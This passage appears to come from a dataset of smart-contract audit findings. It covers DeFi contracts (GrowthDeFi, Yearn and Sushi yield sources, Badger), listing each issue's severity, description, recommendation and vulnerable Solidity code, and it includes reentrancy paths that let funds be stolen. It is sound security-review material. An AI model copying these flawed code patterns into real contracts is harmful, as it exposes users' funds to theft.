good idea to handle this situation to minimize relying on the security of the external contracts.чResolution\\nClient's statement : “This issue did not really need fixing. 
The mitigation was already in place by depositing a tiny amount of the reserve into the contract, if necessary”\\nThere are a few options how to mitigate the issue:\\nDouble-check the balance difference before and after the MasterChef's `withdraw` function is called.\\nHandle this situation in the emergency mode (https://github.com/ConsenSys/growthdefi-audit-2021-06/issues/11).чч```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, \"high slippage\");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n -The capping mechanism for Panther token leads to increased feesчmediumчPanther token has a cap in transfer sizes, so any transfer in the contract is limited beforehand:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 
\\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nFees here are calculated from the full amount of rewards (__totalReward ):\\n```\\n(uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n```\\n\\nBut in fact, if the amount of the rewards is too big, it will be capped, and the residuals will be “taxed” again during the next call of the `gulp` function. That behavior leads to multiple taxations of the same tokens, which means increased fees.чResolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nThe best solution would be to cap `__totalReward` first and then calculate fees from the capped value.чч```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n 
Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), \"exchange not set\");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, \"high slippage\");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n -The _capFeeAmount function is not working as intendedчmediumчPanther token has a limit on the transfer size. Because of that, all the Panther transfer values in the `PantherSwapCompoundingStrategyToken` are also capped beforehand. The following function is called to cap the size of fees:\\n```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n\\nThis function should return the capped amount and the amount of retained tokens. 
But because the `_amount` is changed before calculating the `_retained`, the retained amount will always be 0.чCalculate the `retained` value before changing the `amount`.чч```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n -Stale split ratios in UniversalBuybackчmediumчThe `gulp` and `pendingBurning` functions of the `UniversalBuyback` contract use the hardcoded, constant values of `DEFAULT_REWARD_BUYBACK1_SHARE` and `DEFAULT_REWARD_BUYBACK2_SHARE` to determine the ratio the trade value is split with.\\nConsequently, any call to `setRewardSplit` to set a new ratio will be ineffective but still result in a `ChangeRewardSplit` event being emitted. This event can deceive system operators and users as it does not reflect the correct values of the contract.\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\nчInstead of the default values, `rewardBuyback1Share` and `rewardBuyback2Share` should be used.чч```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n -Exchange owner might steal users' funds using reentrancyчmediumчThe practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. 
In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, 
\\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\nчReentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.чч```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return 
\\_outputAmount;\\n}\\n```\\n -Exchange owner might steal users' funds using reentrancyчmediumчThe practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return 
\\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\nчReentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.чч```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = 
UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n -Yearn: Re-entrancy attack during depositчhighчDuring the deposit in the `supplyTokenTo` function, the token transfer is happening after the shares are minted and before tokens are deposited to the yearn vault:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n\\nIf the token allows the re-entrancy (e.g., ERC-777), the attacker can do one more transaction during the token transfer and call the `supplyTokenTo` function again. This second call will be done with already modified shares from the first deposit but non-modified token balances. That will lead to an increased amount of shares minted during the `supplyTokenTo`. 
By using that technique, it's possible to steal funds from other users of the contract.чHave the re-entrancy guard on all the external functions.чч```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n -Yearn: Partial deposits are not processed properlyчhighчThe deposit is usually made with all the token balance of the contract:\\n```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n\\nThe Yearn vault contract has a limit of how many tokens can be deposited there. If the deposit hits the limit, only part of the tokens is deposited (not to exceed the limit). That case is not handled properly, the shares are minted as if all the tokens are accepted, and the “change” is not transferred back to the caller:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\nчHandle the edge cases properly.чч```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n -Sushi: redeemToken redeems less than it shouldчmediumчThe `redeemToken` function takes as argument the amount of SUSHI to redeem. 
Because the SushiBar's `leave` function - which has to be called to achieve this goal - takes an amount of xSUSHI that is to be burned in exchange for SUSHI, `redeemToken` has to compute the amount of xSUSHI that will result in a return of as many SUSHI tokens as were requested.\\n```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n\\nBecause the necessary calculations involve division and amounts have to be integral values, it is usually not possible to get the exact amount of SUSHI tokens that were requested. More precisely, let `a` denote the total supply of xSUSHI and `b` the SushiBar's balance of SUSHI at `a` certain point in time. If the SushiBar's `leave` function is supplied with `x` xSUSHI, then it will transfer floor(x * `b` / a) SUSHI. 
(We assume throughout this discussion that the numbers involved are small enough such that no overflow occurs and that `a` and `b` are not zero.)\\nHence, if `y` is the amount of SUSHI requested, it would make sense to call `leave` with the biggest number `x` that satisfies floor(x * b / a) <= `y` or the smallest number `x` that satisfies `floor(x * b / a) >= y`. Which of the two is “better” or “correct” needs to be specified, based on the requirements of the caller of `redeemToken`. It seems plausible, though, that the first variant is the one that makes more sense in this context, and the current implementation of `redeemToken` supports this hypothesis. It calls `leave` with `x1 := floor(y * a / b)`, which gives us floor(x1 * b / a) <= `y`. However, `x1` is not necessarily the biggest number that satisfies the relation, so the caller of `redeemToken` might end up with less SUSHI than they could have gotten while still not exceeding `y`.\\nThe correct amount to call `leave` with is `x2 := floor((y * a + a - 1) / b)` = max { x | floor(x * b / a) <= y }. Since `|x2 - x1| <= 1`, the difference in SUSHI is at most `floor(b / a)`. Nevertheless, even this small difference might subvert fairly reasonable expectations. For example, if someone queries `balanceOfToken` and immediately after that feeds the result into `redeemToken`, they might very well expect to redeem exactly the given amount and not less; it's their current balance, after all. However, that's not always the case with the current implementation.чCalculate `requiredShares` based on the formula above (x2). We also recommend dealing in a clean way with the special cases `totalShares == 0` and `barSushiBalance == 0`.чч```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. 
Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n -Sushi: balanceOfToken underestimates balanceчmediumчThe `balanceOfToken` computation is too pessimistic, i.e., it can underestimate the current balance slightly.\\n```\\n/// @notice Returns the total balance (in asset tokens). 
This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n\\nFirst, it calculates the amount of SUSHI that “belongs to” the yield source contract (sushiBalance), and then it determines the fraction of that amount that would be owed to the address in question. However, the “belongs to” above is a purely theoretical concept; it never happens that the yield source contract as a whole redeems and then distributes that amount among its shareholders; instead, if a shareholder redeems tokens, their request is passed through to the `SushiBar`. So in reality, there's no reason for this two-step process, and the holder's balance of SUSHI is more accurately computed as `balances[addr].mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(totalShares)`, which can be greater than what `balanceOfToken` currently returns. Note that this is the amount of SUSHI that `addr` could withdraw directly from the `SushiBar`, based on their amount of shares. Observe also that if we sum these numbers up over all holders in the yield source contract, the result is smaller than or equal to `sushiBalance`. So the sum still doesn't exceed what “belongs to” the yield source contract.чThe `balanceOfToken` function should use the formula above.чч```\\n/// @notice Returns the total balance (in asset tokens). 
This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n -Yearn: Redundant approve callчlowчThe approval for token transfer is done in the following way:\\n```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n\\nSince the approval will be equal to the maximum value, there's no need to make zero-value approval first.чChange two `safeApprove` to one regular `approve` with the maximum value.чч```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n -Sushi: Some state variables should be immutable and have more specific typesчlowчThe state variables `sushiBar` and `sushiAddr` are initialized in the contract's constructor and never changed afterward.\\n```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n\\nThey should be immutable; that would save some gas and make it clear that they won't (and can't) be changed once the contract has been deployed.\\nMoreover, they would better have more specific interface 
types than `address`, i.e., `ISushiBar` for `sushiBar` and `ISushi` for `sushiAddr`. That would be safer and make the code more readable.чMake these two state variables `immutable` and change their types as indicated above. Remove the corresponding explicit type conversions in the rest of the contract, and add explicit conversions to type `address` where necessary.чч```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n -Sushi: Unnecessary balance queriesчlowчIn function `redeemToken`, `barBalanceDiff` is always the same as `requiredShares` because the SushiBar's `leave` function burns exactly `requiredShares` xSUSHI.\\n```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\nчUse `requiredShares` instead of `barBalanceDiff`, and remove the unnecessary queries and variables.чч```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = 
balances[msg.sender].sub(barBalanceDiff);\\n```\\n -Sushi: Unnecessary function declaration in interfaceчlowчThe `ISushiBar` interface declares a `transfer` function.\\n```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n\\nHowever, this function is never used, so it could be removed from the interface. Other functions that the `SushiBar` provides but are not used (approve, for example) aren't part of the interface either.чRemove the `transfer` declaration from the `ISushiBar` interface.чч```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n -Simplify the harvest method in each SinglePlusчlowчThe `BadgerSBTCCrvPlus` single plus contract implements a custom `harvest` method.\\n```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n\\nThis method can only be called by the strategist because of the `onlyStrategist` modifier.\\nThis method has a few steps which take one asset and transform it into another asset a few times.\\nIt first claims the Badger tokens:\\n```\\n// 1. 
Harvest from Badger Tree\\nIBadgerTree(BADGER\\_TREE).claim(\\_tokens, \\_cumulativeAmounts, \\_index, \\_cycle, \\_merkleProof, \\_amountsToClaim);\\n```\\n\\nThen it transforms the Badger tokens into WBTC using Uniswap.\\n```\\n// 2. Sushi: Badger --> WBTC\\nuint256 \\_badger = IERC20Upgradeable(BADGER).balanceOf(address(this));\\nif (\\_badger > 0) {\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, 0);\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, \\_badger);\\n\\n address[] memory \\_path = new address[](2);\\n \\_path[0] = BADGER;\\n \\_path[1] = WBTC;\\n\\n IUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n}\\n```\\n\\nThis step can be simplified in two ways.\\nFirst, the `safeApprove` method isn't useful because its usage is not recommended anymore.\\nThe OpenZeppelin version 4 implementation states the method is deprecated and its usage is discouraged.\\n```\\n\\* @dev Deprecated. This function has issues similar to the ones found in\\n\\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\n```\\n \\* @dev Deprecated. This function has issues similar to the ones found in\\n \\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\nAnother step is swapping the tokens on Uniswap.\\n```\\nIUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n```\\n\\nIn this case, the last argument `block.timestamp.add(1800)` is the 